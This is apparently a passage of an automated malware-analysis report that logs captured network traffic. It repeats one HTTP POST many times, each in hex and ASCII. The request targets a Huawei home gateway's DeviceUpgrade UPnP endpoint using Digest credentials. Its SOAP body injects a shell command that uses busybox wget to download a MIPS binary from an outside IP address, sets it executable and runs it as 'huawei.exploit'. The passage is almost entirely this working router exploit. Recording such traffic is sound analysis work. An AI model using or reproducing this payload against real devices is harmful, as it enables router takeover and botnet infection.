4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 